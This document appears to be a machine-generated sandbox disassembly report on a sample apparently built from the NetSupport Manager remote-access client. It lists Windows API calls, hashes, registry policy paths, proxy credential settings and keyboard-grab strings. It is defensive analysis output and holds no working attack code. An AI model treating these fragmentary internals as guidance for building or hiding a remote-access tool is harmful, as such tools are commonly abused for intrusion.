                                                                                        • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                      • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                      • API String ID: 3930710499-403456261
                                                                                      • Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                      • Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
                                                                                      • Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                      • Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11
                                                                                      APIs
                                                                                        • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                        • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                        • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                        • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                      • PostMessageA.USER32(00030496,000006CF,00000007,00000000), ref: 11138E0F
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • SetWindowTextA.USER32(00030496,00000000), ref: 11138EB7
                                                                                      • IsWindowVisible.USER32(00030496), ref: 11138F7C
                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
                                                                                      • IsWindowVisible.USER32(00030496), ref: 11138FAA
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 11138FD8
                                                                                      • EnableWindow.USER32(00030496,00000001), ref: 11138FE7
                                                                                      • IsWindowVisible.USER32(00030496), ref: 11139038
                                                                                      • IsWindowVisible.USER32(00030496), ref: 11139045
                                                                                      • EnableWindow.USER32(00030496,00000000), ref: 11139059
                                                                                      • EnableWindow.USER32(00030496,00000000), ref: 11138FBF
                                                                                        • Part of subcall function 11131210: ShowWindow.USER32(00030496,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                      • EnableWindow.USER32(00030496,00000001), ref: 1113906D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                      • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                      • API String ID: 3453649892-3803836183
                                                                                      • Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                      • Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
                                                                                      • Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                      • Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<^l
                                                                                      • API String ID: 2111968516-2245968893
                                                                                      • Opcode ID: a4e93b3c8ccc3a6b7aca88ff6a4ce5e76e438b27463c39e0fb5cbacf9f3d350e
                                                                                      • Instruction ID: 7efd35a4ae0c02fe8056c906006a5b9779c271741d730474cfeafd88f3de7ded
                                                                                      • Opcode Fuzzy Hash: a4e93b3c8ccc3a6b7aca88ff6a4ce5e76e438b27463c39e0fb5cbacf9f3d350e
                                                                                      • Instruction Fuzzy Hash: AD2288B2A04368ABDB24DF68CC80EEAB7B9EB49304F0485D9E54967A40D7315FC8CF51
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                      • wsprintfA.USER32 ref: 11028214
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                      • wsprintfA.USER32 ref: 11028291
                                                                                      • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                      • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                      • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                      • API String ID: 512045693-419896573
                                                                                      • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                      • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                      • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                      • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(PCIINV.DLL,A1BC2D8B,02A87CE8,02A87CD8,?,00000000,1118276C,000000FF,?,11031942,02A87CE8,00000000,?,?,?), ref: 11085E45
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                      • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                      • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                      • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                      • wsprintfA.USER32 ref: 11085F1B
                                                                                      • wsprintfA.USER32 ref: 11085F32
                                                                                      • wsprintfA.USER32 ref: 11085F49
                                                                                      • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02A87CE8,00000000,?,?,?), ref: 11085A98
                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02A87CE8,00000000,?,?,?), ref: 11085AAB
                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02A87CE8,00000000,?,?,?), ref: 11085ABE
                                                                                        • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,110860C0,?,11031942,02A87CE8,00000000,?,?,?), ref: 11085AD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                      • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                      • API String ID: 4263811268-2492245516
                                                                                      • Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                      • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                      • Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                      • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
                                                                                      APIs
                                                                                      • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
                                                                                      • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110306C2
                                                                                      • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                      • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                      • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                      • API String ID: 2061479752-1320826866
                                                                                      • Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                      • Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
                                                                                      • Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                      • Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 1110612E
                                                                                      • EnterCriticalSection.KERNEL32(111F060C), ref: 11106137
                                                                                      • GetTickCount.KERNEL32 ref: 1110613D
                                                                                      • GetTickCount.KERNEL32 ref: 11106190
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C), ref: 11106199
                                                                                      • GetTickCount.KERNEL32 ref: 111061CA
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C), ref: 111061D3
                                                                                      • EnterCriticalSection.KERNEL32(111F060C), ref: 111061FC
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C,00000000,?,00000000), ref: 111062C3
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • Part of subcall function 110F0CF0: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106267,?), ref: 110F0D1B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                                      • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                      • API String ID: 1574099134-3013461081
                                                                                      • Opcode ID: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
                                                                                      • Instruction ID: 01093d0ef8ba3b8d66a1f5e3f4838d53f0bc1b4d1e9212342b6ef41ebc516d7c
                                                                                      • Opcode Fuzzy Hash: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
                                                                                      • Instruction Fuzzy Hash: 64410E79F0411AABD700DFA59C81E9EFBB9EB8462CF524535F909E7240EA306904CBE1
                                                                                      APIs
                                                                                        • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
                                                                                      • GetTickCount.KERNEL32 ref: 1102C47A
                                                                                        • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                      • GetTickCount.KERNEL32 ref: 1102C574
                                                                                        • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                        • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
                                                                                      • CloseHandle.KERNEL32(?), ref: 1102C688
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                      • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                      • API String ID: 596640303-1725438197
                                                                                      • Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                      • Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
                                                                                      • Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                      • Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                        • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                        • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Enum$Open$CloseValue
                                                                                      • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                      • API String ID: 2823542970-1528906934
                                                                                      • Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                      • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                      • Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                      • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • GetTickCount.KERNEL32 ref: 11137692
                                                                                        • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                        • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                        • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
